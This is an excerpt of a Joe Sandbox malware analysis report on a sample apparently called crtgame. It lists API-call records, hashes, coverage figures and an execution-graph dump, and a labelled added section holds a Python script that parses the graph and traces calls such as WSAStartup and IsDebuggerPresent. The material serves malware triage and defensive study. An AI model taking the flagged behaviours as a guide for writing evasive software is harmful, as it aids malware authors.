                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                          • API String ID: 1385375860-4131005785
                                                                          • Opcode ID: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                          • Instruction ID: 0bfe33c8882bc5da799f901860b26a8a70e2baa25249e611fba62494fac00854
                                                                          • Opcode Fuzzy Hash: ae729fa98e27c6751e545e4d597dad0f21c0824f8bd7fd76f6a38a193a7a3fad
                                                                          • Instruction Fuzzy Hash: FA3124719052846EEB319A705C55BDA3F6C9B0730AF2404FFD085F92C2E63D8F8A8B19
                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 004048EB
                                                                          • GetFileType.KERNEL32(00000800), ref: 00404991
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 004049EA
                                                                          • GetFileType.KERNEL32(00000000), ref: 004049F8
                                                                          • SetHandleCount.KERNEL32 ref: 00404A2F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                          • String ID:
                                                                          • API String ID: 1710529072-0
                                                                          • Opcode ID: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                          • Instruction ID: 4e5b6c2e9b57b0b0783508239f10a0ad73356ae994103a46a91c1c9ef3db655a
                                                                          • Opcode Fuzzy Hash: 6f1dcd6f7bcd673d6421e3e5aab1f6b36c8d09db57b6c5e6c0d92ede4df305ad
                                                                          • Instruction Fuzzy Hash: EF5124F16043608BD7208B38CD447673BA0BB81324F1A473AE6E6FB2E1D73C8855875A
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,N@ ,?,00000000,00000000,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID: N@
                                                                          • API String ID: 352835431-2588724849
                                                                          • Opcode ID: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                          • Instruction ID: 20da4dc5c4367d057857615b5720e39787682ab55b18fc8d36651601e05c1bdf
                                                                          • Opcode Fuzzy Hash: 2e404fdc1400399f752b075283bc6775304d52c7d5638f1181ef196f2002daac
                                                                          • Instruction Fuzzy Hash: 1C11D432900609ABDF228F94CD44ADFBBB6EB48750F148166FE16721A0D3368D61DF64
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(000000FF,00000000,00008000,@q@,00403D9C,@q@,7591DFF0,?,00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CAB
                                                                          • HeapFree.KERNEL32(00000000,?,?,00403E4E,00000010,00403103,?,?), ref: 00403CE1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Free$HeapVirtual
                                                                          • String ID: @q@$@q@
                                                                          • API String ID: 3783212868-1591251108
                                                                          • Opcode ID: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                          • Instruction ID: f6895fdbbb123314fbd550313b942ac7b83e67952c1407439619f49545067eb6
                                                                          • Opcode Fuzzy Hash: 7ac4ff149bfc0749d320f4b1f8ac69e321ccad7dceeb4d9086af9ddb8db2ce1d
                                                                          • Instruction Fuzzy Hash: 88F03431A04210DFD3249F28EE09A427BF4FB08710B014A2AE4A6AB3E1C731AC40CF48
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 0040571A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $
                                                                          • API String ID: 1807457897-3032137957
                                                                          • Opcode ID: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                          • Instruction ID: f7edae9c6ae74023553f5d2ec798d7d3c7047796f49532e24c337197b6512109
                                                                          • Opcode Fuzzy Hash: db703bf84d1e74bea7e02b3975d1c483e6a577ba1b4e559dc1a3ea706ac2fa80
                                                                          • Instruction Fuzzy Hash: 494154320007A85EEB15A724DD49BFB3FA9DB06704F1400F6D946FB192C27949289FAF
                                                                          APIs
                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 004039D4
                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A08
                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A22
                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403774,?,?,?,00000100,?,00000000), ref: 00403A39
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap$FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 3499195154-0
                                                                          • Opcode ID: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                          • Instruction ID: 429f96408e1d6026f999a6daa987e4c74961ce2be0a7022420d0a9926faab586
                                                                          • Opcode Fuzzy Hash: 815b37c226e90a6b2b1dc44bc2b4124515e82b896c198061cc2002f0bf7c6368
                                                                          • Instruction Fuzzy Hash: E4116A702003019FC7218F28EE49E267BB9FB957217184A3AF1D2E71B0D7729961CF09

                                                                          Execution Graph

                                                                          Execution Coverage:11.6%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:3.6%
                                                                          Total number of Nodes:750
                                                                          Total number of Limit Nodes:37
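The execution_graph listing that follows is the sandbox's node/edge dump flattened into one token stream: each node is a decimal id, a 7-digit hex block address and zero or more labels (a Win32 API name, a symbol such as __lock, _doexit or ___raise_securityfailure that the sandbox matched against the statically linked MSVC runtime, or the marker "N API calls" on one of the 37 collapsed limit nodes), and each edge is written src->dst. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that format, separates API names from symbol labels, lists the root blocks, and prints the shortest path from a root to the block that invokes a given API, so the symbols crossed on the way show whether a flagged call sits in runtime code (IsDebuggerPresent at 2bd8f3e, whose neighbouring blocks carry __NMSG_WRITE and ___raise_securityfailure) or in the sample's own code (WSAStartup at 2bc1ac5, reached from the 2bc1xxx blocks after __cinit). SAMPLE is a constructed, abridged excerpt of the listing, and is_api is a naming heuristic, not a lookup against the module's imports.

```python
"""Parse a flattened Joe Sandbox execution_graph listing (added example)."""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{7,8}$")      # block addresses as printed, e.g. 2bc1ac5
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Constructed, abridged excerpt of the listing (the full graph has 750 nodes).
SAMPLE = """
14939 2c43b75 CloseHandle 14940 2c4855e 14939->14940 14948 2bc1057 14949 2bc1aa9
InterlockedIncrement 14948->14949 14950 2bc105c 14949->14950 14951 2bc1ac5 WSAStartup
InterlockedExchange 14949->14951 14951->14950 14959 2bd2cdb ___lock_fhandle 14959->14948
14996 2bd82ef __lock 59 API calls 14999 2bd83d6 14996->14999 15023 2bd8150 __NMSG_WRITE
15056 2bd8277 15023->15056 15154 2bd3f4b 15056->15154 15155 2bd3f55 IsProcessorFeaturePresent
15154->15155 15158 2bd8f8f 15155->15158 15161 2bd8f3e IsDebuggerPresent 15158->15161
15162 2bd8f53 ___raise_securityfailure 15161->15162 15167 2bd8f28 SetUnhandledExceptionFilter
UnhandledExceptionFilter 15162->15167 15165 2bd8f5b ___raise_securityfailure 15168 2bd8f13
GetCurrentProcess TerminateProcess 15165->15168 15167->15165
"""

def parse_graph(text):
    """Return ({id: {"addr": int, "labels": [str]}}, [(src, dst), ...])."""
    tokens = text.split()
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            # A node is "<id> <hex address>". A bare number such as the 59 in
            # "59 API calls" is not followed by an address and stays a label.
            current = int(tok)
            nodes[current] = {"addr": int(tokens[i + 1], 16), "labels": []}
            i += 2
        else:
            if current is not None:
                nodes[current]["labels"].append(tok)
            i += 1
    return nodes, edges

def split_labels(labels):
    """Separate symbol/API names from the "N API calls" marker of a limit node."""
    names, limit, i = [], None, 0
    while i < len(labels):
        if NODE_ID.match(labels[i]) and labels[i + 1:i + 3] == ["API", "calls"]:
            limit, i = int(labels[i]), i + 3
        else:
            names.append(labels[i])
            i += 1
    return names, limit

def is_api(name):
    """Heuristic: Win32/NT exports are CamelCase without '_' or '::'. CRT helpers
    with export-like names (FindHandlerForForeignException) slip through; a real
    triage would check the name against the module's import table instead."""
    return name[0].isupper() and "_" not in name and "::" not in name

def api_names(node):
    return [n for n in split_labels(node["labels"])[0] if is_api(n)]

def callers_of(nodes, api):
    """Addresses of the blocks on which the sandbox placed the given API."""
    return sorted(n["addr"] for n in nodes.values() if api in api_names(n))

def roots(nodes, edges):
    """Blocks with no incoming edge: entry points of the recorded execution."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)

def path_to_api(nodes, edges, root, api):
    """Shortest path root -> first block calling api, as [(id, labels), ...].
    The labels along the way show which runtime or sample functions it crosses."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    prev, queue = {root: None}, deque([root])
    while queue:
        nid = queue.popleft()
        if nid in nodes and api in api_names(nodes[nid]):
            path = []
            while nid is not None:
                path.append((nid, nodes.get(nid, {"labels": []})["labels"]))
                nid = prev[nid]
            return path[::-1]
        for nxt in succ[nid]:
            if nxt not in prev:
                prev[nxt] = nid
                queue.append(nxt)
    return None

if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    print("roots:", roots(nodes, edges))
    for api in ("WSAStartup", "IsDebuggerPresent"):
        print(api, "on blocks", [hex(a) for a in callers_of(nodes, api)])
    for nid, labels in path_to_api(nodes, edges, 15023, "IsDebuggerPresent"):
        print(f"  {nid} {nodes[nid]['addr']:x} {' '.join(labels)}")
```

To run it over the whole report, replace SAMPLE with the complete execution_graph text joined by whitespace; the listing sometimes breaks a node's id and its address across lines, which the whitespace split tolerates. A limit count on a node means the sandbox collapsed a subgraph there, so a path that runs through such a node is incomplete and the hidden calls have to be read from the per-function API records above.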
                                                                          execution_graph 14939 2c43b75 CloseHandle 14940 2c4855e 14939->14940 14941 2bc104d 14946 2bd2da4 14941->14946 14952 2bd2ca8 14946->14952 14948 2bc1057 14949 2bc1aa9 InterlockedIncrement 14948->14949 14950 2bc105c 14949->14950 14951 2bc1ac5 WSAStartup InterlockedExchange 14949->14951 14951->14950 14953 2bd2cb4 ___lock_fhandle 14952->14953 14960 2bd7f92 14953->14960 14959 2bd2cdb ___lock_fhandle 14959->14948 14977 2bd82ef 14960->14977 14962 2bd2cbd 14963 2bd2cec RtlDecodePointer RtlDecodePointer 14962->14963 14964 2bd2d19 14963->14964 14965 2bd2cc9 14963->14965 14964->14965 15276 2bd8b5d 14964->15276 14974 2bd2ce6 14965->14974 14967 2bd2d7c RtlEncodePointer RtlEncodePointer 14967->14965 14968 2bd2d2b 14968->14967 14969 2bd2d50 14968->14969 15283 2bd84fd 14968->15283 14969->14965 14971 2bd84fd __realloc_crt 62 API calls 14969->14971 14973 2bd2d6a RtlEncodePointer 14969->14973 14972 2bd2d64 14971->14972 14972->14965 14972->14973 14973->14967 15310 2bd7f9b 14974->15310 14978 2bd8300 14977->14978 14979 2bd8313 RtlEnterCriticalSection 14977->14979 14984 2bd8377 14978->14984 14979->14962 14981 2bd8306 14981->14979 15006 2bd7e3f 14981->15006 14985 2bd8383 ___lock_fhandle 14984->14985 14986 2bd83a2 14985->14986 15013 2bd80d5 14985->15013 14995 2bd83c5 ___lock_fhandle 14986->14995 15060 2bd84b6 14986->15060 14992 2bd8398 15057 2bd7d1c 14992->15057 14993 2bd83cf 14996 2bd82ef __lock 59 API calls 14993->14996 14994 2bd83c0 15065 2bd585b 14994->15065 14995->14981 14999 2bd83d6 14996->14999 15000 2bd83fb 14999->15000 15001 2bd83e3 14999->15001 15071 2bd2974 15000->15071 15068 2bd8c0c 15001->15068 15004 2bd83ef 15077 2bd8417 15004->15077 15007 2bd80d5 __FF_MSGBANNER 59 API calls 15006->15007 15008 2bd7e47 15007->15008 15009 2bd8132 __NMSG_WRITE 59 API calls 15008->15009 15010 2bd7e4f 15009->15010 15246 2bd7eee 15010->15246 15080 2bdfb7e 15013->15080 15015 2bd80dc 15017 2bdfb7e __NMSG_WRITE 59 API calls 
15015->15017 15019 2bd80e9 15015->15019 15016 2bd8132 __NMSG_WRITE 59 API calls 15018 2bd8101 15016->15018 15017->15019 15021 2bd8132 __NMSG_WRITE 59 API calls 15018->15021 15019->15016 15020 2bd810b 15019->15020 15022 2bd8132 15020->15022 15021->15020 15023 2bd8150 __NMSG_WRITE 15022->15023 15024 2bdfb7e __NMSG_WRITE 55 API calls 15023->15024 15056 2bd8277 15023->15056 15026 2bd8163 15024->15026 15028 2bd827c GetStdHandle 15026->15028 15029 2bdfb7e __NMSG_WRITE 55 API calls 15026->15029 15027 2bd82e0 15027->14992 15032 2bd828a std::exception::_Copy_str 15028->15032 15028->15056 15030 2bd8174 15029->15030 15030->15028 15031 2bd8186 15030->15031 15031->15056 15102 2bdef3d 15031->15102 15034 2bd82c3 WriteFile 15032->15034 15032->15056 15034->15056 15036 2bd82e4 15040 2bd4905 __invoke_watson 8 API calls 15036->15040 15037 2bd81b3 GetModuleFileNameW 15038 2bd81e3 __NMSG_WRITE 15037->15038 15039 2bd81d3 15037->15039 15038->15036 15049 2bd8229 15038->15049 15111 2bdefb2 15038->15111 15041 2bdef3d __NMSG_WRITE 55 API calls 15039->15041 15042 2bd82ee 15040->15042 15041->15038 15043 2bd8313 RtlEnterCriticalSection 15042->15043 15044 2bd8377 __mtinitlocknum 55 API calls 15042->15044 15043->14992 15046 2bd8306 15044->15046 15046->15043 15050 2bd7e3f __amsg_exit 55 API calls 15046->15050 15049->15036 15120 2bdeed1 15049->15120 15052 2bd8312 15050->15052 15051 2bdeed1 __NMSG_WRITE 55 API calls 15053 2bd8260 15051->15053 15052->15043 15053->15036 15054 2bd8267 15053->15054 15129 2bdfbbe RtlEncodePointer 15054->15129 15154 2bd3f4b 15056->15154 15169 2bd7ce8 GetModuleHandleExW 15057->15169 15063 2bd84c4 15060->15063 15062 2bd83b9 15062->14993 15062->14994 15063->15062 15172 2bd29ac 15063->15172 15189 2bd8f05 Sleep 15063->15189 15192 2bd5672 GetLastError 15065->15192 15067 2bd5860 15067->14995 15069 2bd8c1c 15068->15069 15070 2bd8c29 InitializeCriticalSectionAndSpinCount 15068->15070 15069->15004 15070->15004 15072 2bd297d HeapFree 15071->15072 15073 2bd29a6 __dosmaperr 
15071->15073 15072->15073 15074 2bd2992 15072->15074 15073->15004 15075 2bd585b __cftoe2_l 57 API calls 15074->15075 15076 2bd2998 GetLastError 15075->15076 15076->15073 15245 2bd8459 RtlLeaveCriticalSection 15077->15245 15079 2bd841e 15079->14995 15081 2bdfb88 15080->15081 15082 2bdfb92 15081->15082 15083 2bd585b __cftoe2_l 59 API calls 15081->15083 15082->15015 15084 2bdfbae 15083->15084 15087 2bd48f5 15084->15087 15090 2bd48ca RtlDecodePointer 15087->15090 15091 2bd48dd 15090->15091 15096 2bd4905 IsProcessorFeaturePresent 15091->15096 15094 2bd48ca __cftoe2_l 8 API calls 15095 2bd4901 15094->15095 15095->15015 15097 2bd4910 15096->15097 15098 2bd4798 __call_reportfault 7 API calls 15097->15098 15099 2bd4925 15098->15099 15100 2bd8f13 ___raise_securityfailure GetCurrentProcess TerminateProcess 15099->15100 15101 2bd48f4 15100->15101 15101->15094 15103 2bdef48 15102->15103 15104 2bdef56 15102->15104 15103->15104 15109 2bdef6f 15103->15109 15105 2bd585b __cftoe2_l 59 API calls 15104->15105 15106 2bdef60 15105->15106 15107 2bd48f5 __cftoe2_l 9 API calls 15106->15107 15108 2bd81a6 15107->15108 15108->15036 15108->15037 15109->15108 15110 2bd585b __cftoe2_l 59 API calls 15109->15110 15110->15106 15112 2bdefc0 15111->15112 15115 2bdefc4 15112->15115 15117 2bdefc9 15112->15117 15118 2bdf003 15112->15118 15113 2bd585b __cftoe2_l 59 API calls 15114 2bdeff4 15113->15114 15116 2bd48f5 __cftoe2_l 9 API calls 15114->15116 15115->15113 15115->15117 15116->15117 15117->15049 15118->15117 15119 2bd585b __cftoe2_l 59 API calls 15118->15119 15119->15114 15121 2bdeeeb 15120->15121 15123 2bdeedd 15120->15123 15122 2bd585b __cftoe2_l 59 API calls 15121->15122 15128 2bdeef5 15122->15128 15123->15121 15126 2bdef17 15123->15126 15124 2bd48f5 __cftoe2_l 9 API calls 15125 2bd8249 15124->15125 15125->15036 15125->15051 15126->15125 15127 2bd585b __cftoe2_l 59 API calls 15126->15127 15127->15128 15128->15124 15130 2bdfbf2 ___crtIsPackagedApp 15129->15130 15131 2bdfcb1 IsDebuggerPresent 
15130->15131 15132 2bdfc01 LoadLibraryExW 15130->15132 15135 2bdfcbb 15131->15135 15136 2bdfcd6 15131->15136 15133 2bdfc3e GetProcAddress 15132->15133 15134 2bdfc18 GetLastError 15132->15134 15138 2bdfc52 7 API calls 15133->15138 15144 2bdfcce 15133->15144 15137 2bdfc27 LoadLibraryExW 15134->15137 15134->15144 15139 2bdfcc9 15135->15139 15140 2bdfcc2 OutputDebugStringW 15135->15140 15136->15139 15141 2bdfcdb RtlDecodePointer 15136->15141 15137->15133 15137->15144 15142 2bdfcae 15138->15142 15143 2bdfc9a GetProcAddress RtlEncodePointer 15138->15143 15139->15144 15145 2bdfd02 RtlDecodePointer RtlDecodePointer 15139->15145 15153 2bdfd1a 15139->15153 15140->15139 15141->15144 15142->15131 15143->15142 15146 2bd3f4b __cftoe2_l 6 API calls 15144->15146 15145->15153 15149 2bdfda0 15146->15149 15147 2bdfd52 RtlDecodePointer 15150 2bdfd59 15147->15150 15152 2bdfd3e RtlDecodePointer 15147->15152 15149->15056 15151 2bdfd6a RtlDecodePointer 15150->15151 15150->15152 15151->15152 15152->15144 15153->15147 15153->15152 15155 2bd3f55 IsProcessorFeaturePresent 15154->15155 15156 2bd3f53 15154->15156 15158 2bd8f8f 15155->15158 15156->15027 15161 2bd8f3e IsDebuggerPresent 15158->15161 15162 2bd8f53 ___raise_securityfailure 15161->15162 15167 2bd8f28 SetUnhandledExceptionFilter UnhandledExceptionFilter 15162->15167 15165 2bd8f5b ___raise_securityfailure 15168 2bd8f13 GetCurrentProcess TerminateProcess 15165->15168 15166 2bd8f78 15166->15027 15167->15165 15168->15166 15170 2bd7d13 ExitProcess 15169->15170 15171 2bd7d01 GetProcAddress 15169->15171 15171->15170 15173 2bd2a27 15172->15173 15177 2bd29b8 15172->15177 15174 2bd7c03 __calloc_impl RtlDecodePointer 15173->15174 15175 2bd2a2d 15174->15175 15178 2bd585b __cftoe2_l 58 API calls 15175->15178 15176 2bd29c3 15176->15177 15179 2bd80d5 __FF_MSGBANNER 58 API calls 15176->15179 15182 2bd8132 __NMSG_WRITE 58 API calls 15176->15182 15186 2bd7d1c _doexit 3 API calls 15176->15186 15177->15176 15180 2bd29eb RtlAllocateHeap 15177->15180 15183 
2bd2a13 15177->15183 15187 2bd2a11 15177->15187 15190 2bd7c03 RtlDecodePointer 15177->15190 15181 2bd2a1f 15178->15181 15179->15176 15180->15177 15180->15181 15181->15063 15182->15176 15185 2bd585b __cftoe2_l 58 API calls 15183->15185 15185->15187 15186->15176 15188 2bd585b __cftoe2_l 58 API calls 15187->15188 15188->15181 15189->15063 15191 2bd7c16 15190->15191 15191->15177 15206 2bd8bcb 15192->15206 15194 2bd5687 15195 2bd56d5 SetLastError 15194->15195 15209 2bd846e 15194->15209 15195->15067 15199 2bd56ae 15200 2bd56cc 15199->15200 15201 2bd56b4 15199->15201 15203 2bd2974 __freefls@4 56 API calls 15200->15203 15218 2bd56e1 15201->15218 15205 2bd56d2 15203->15205 15204 2bd56bc GetCurrentThreadId 15204->15195 15205->15195 15207 2bd8bde 15206->15207 15208 2bd8be2 TlsGetValue 15206->15208 15207->15194 15208->15194 15211 2bd8475 15209->15211 15212 2bd569a 15211->15212 15214 2bd8493 15211->15214 15228 2bdfeb8 15211->15228 15212->15195 15215 2bd8bea 15212->15215 15214->15211 15214->15212 15236 2bd8f05 Sleep 15214->15236 15216 2bd8c04 TlsSetValue 15215->15216 15217 2bd8c00 15215->15217 15216->15199 15217->15199 15219 2bd56ed ___lock_fhandle 15218->15219 15220 2bd82ef __lock 59 API calls 15219->15220 15221 2bd572a 15220->15221 15237 2bd5782 15221->15237 15224 2bd82ef __lock 59 API calls 15225 2bd574b ___addlocaleref 15224->15225 15240 2bd578b 15225->15240 15227 2bd5776 ___lock_fhandle 15227->15204 15229 2bdfec3 15228->15229 15231 2bdfede 15228->15231 15230 2bdfecf 15229->15230 15229->15231 15232 2bd585b __cftoe2_l 58 API calls 15230->15232 15233 2bdfeee RtlAllocateHeap 15231->15233 15234 2bdfed4 15231->15234 15235 2bd7c03 __calloc_impl RtlDecodePointer 15231->15235 15232->15234 15233->15231 15233->15234 15234->15211 15235->15231 15236->15214 15243 2bd8459 RtlLeaveCriticalSection 15237->15243 15239 2bd5744 15239->15224 15244 2bd8459 RtlLeaveCriticalSection 15240->15244 15242 2bd5792 15242->15227 15243->15239 15244->15242 15245->15079 15249 2bd7fa6 15246->15249 15248 
2bd7e5a 15250 2bd7fb2 ___lock_fhandle 15249->15250 15251 2bd82ef __lock 52 API calls 15250->15251 15252 2bd7fb9 15251->15252 15253 2bd8072 _doexit 15252->15253 15254 2bd7fe7 RtlDecodePointer 15252->15254 15269 2bd80c0 15253->15269 15254->15253 15256 2bd7ffe RtlDecodePointer 15254->15256 15262 2bd800e 15256->15262 15258 2bd80cf ___lock_fhandle 15258->15248 15260 2bd801b RtlEncodePointer 15260->15262 15261 2bd80b7 15263 2bd80c0 15261->15263 15264 2bd7d1c _doexit 3 API calls 15261->15264 15262->15253 15262->15260 15265 2bd802b RtlDecodePointer RtlEncodePointer 15262->15265 15266 2bd80cd 15263->15266 15274 2bd8459 RtlLeaveCriticalSection 15263->15274 15264->15263 15268 2bd803d RtlDecodePointer RtlDecodePointer 15265->15268 15266->15248 15268->15262 15270 2bd80c6 15269->15270 15272 2bd80a0 15269->15272 15275 2bd8459 RtlLeaveCriticalSection 15270->15275 15272->15258 15273 2bd8459 RtlLeaveCriticalSection 15272->15273 15273->15261 15274->15266 15275->15272 15277 2bd8b7b RtlSizeHeap 15276->15277 15278 2bd8b66 15276->15278 15277->14968 15279 2bd585b __cftoe2_l 59 API calls 15278->15279 15280 2bd8b6b 15279->15280 15281 2bd48f5 __cftoe2_l 9 API calls 15280->15281 15282 2bd8b76 15281->15282 15282->14968 15285 2bd8504 15283->15285 15286 2bd8541 15285->15286 15288 2bdfda4 15285->15288 15309 2bd8f05 Sleep 15285->15309 15286->14969 15289 2bdfdad 15288->15289 15290 2bdfdb8 15288->15290 15291 2bd29ac _malloc 59 API calls 15289->15291 15292 2bdfdc0 15290->15292 15300 2bdfdcd 15290->15300 15293 2bdfdb5 15291->15293 15294 2bd2974 __freefls@4 59 API calls 15292->15294 15293->15285 15308 2bdfdc8 __dosmaperr 15294->15308 15295 2bdfe05 15297 2bd7c03 __calloc_impl RtlDecodePointer 15295->15297 15296 2bdfdd5 RtlReAllocateHeap 15296->15300 15296->15308 15298 2bdfe0b 15297->15298 15301 2bd585b __cftoe2_l 59 API calls 15298->15301 15299 2bdfe35 15303 2bd585b __cftoe2_l 59 API calls 15299->15303 15300->15295 15300->15296 15300->15299 15302 2bd7c03 __calloc_impl RtlDecodePointer 15300->15302 15305 
2bdfe1d 15300->15305 15301->15308 15302->15300 15304 2bdfe3a GetLastError 15303->15304 15304->15308 15306 2bd585b __cftoe2_l 59 API calls 15305->15306 15307 2bdfe22 GetLastError 15306->15307 15307->15308 15308->15285 15309->15285 15313 2bd8459 RtlLeaveCriticalSection 15310->15313 15312 2bd2ceb 15312->14959 15313->15312 15314 2bd370f 15315 2bd371d 15314->15315 15316 2bd3718 15314->15316 15320 2bd3732 15315->15320 15328 2bdb2e4 15316->15328 15319 2bd372b 15321 2bd373e ___lock_fhandle 15320->15321 15325 2bd378c ___DllMainCRTStartup 15321->15325 15327 2bd37e9 ___lock_fhandle 15321->15327 15332 2bd359d 15321->15332 15323 2bd37c6 15324 2bd359d __CRT_INIT@12 138 API calls 15323->15324 15323->15327 15324->15327 15325->15323 15326 2bd359d __CRT_INIT@12 138 API calls 15325->15326 15325->15327 15326->15323 15327->15319 15329 2bdb314 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 15328->15329 15330 2bdb307 15328->15330 15331 2bdb30b 15329->15331 15330->15329 15330->15331 15331->15315 15333 2bd35a9 ___lock_fhandle 15332->15333 15334 2bd362b 15333->15334 15335 2bd35b1 15333->15335 15337 2bd362f 15334->15337 15338 2bd3694 15334->15338 15380 2bd7be6 GetProcessHeap 15335->15380 15342 2bd3650 15337->15342 15349 2bd35ba ___lock_fhandle __CRT_INIT@12 15337->15349 15481 2bd7e5b 15337->15481 15340 2bd3699 15338->15340 15341 2bd36f7 15338->15341 15339 2bd35b6 15339->15349 15381 2bd5794 15339->15381 15343 2bd8bcb __getptd_noexit TlsGetValue 15340->15343 15341->15349 15512 2bd5624 15341->15512 15484 2bd7d32 RtlDecodePointer 15342->15484 15346 2bd36a4 15343->15346 15346->15349 15352 2bd846e __calloc_crt 59 API calls 15346->15352 15349->15325 15350 2bd35c6 __RTC_Initialize 15350->15349 15357 2bd35d6 GetCommandLineA 15350->15357 15353 2bd36b5 15352->15353 15353->15349 15358 2bd8bea __getptd_noexit TlsSetValue 15353->15358 15354 2bdaf7f __ioterm 60 API calls 15356 2bd3661 15354->15356 15359 2bd580a __mtterm 62 API calls 15356->15359 15402 2bdb380 
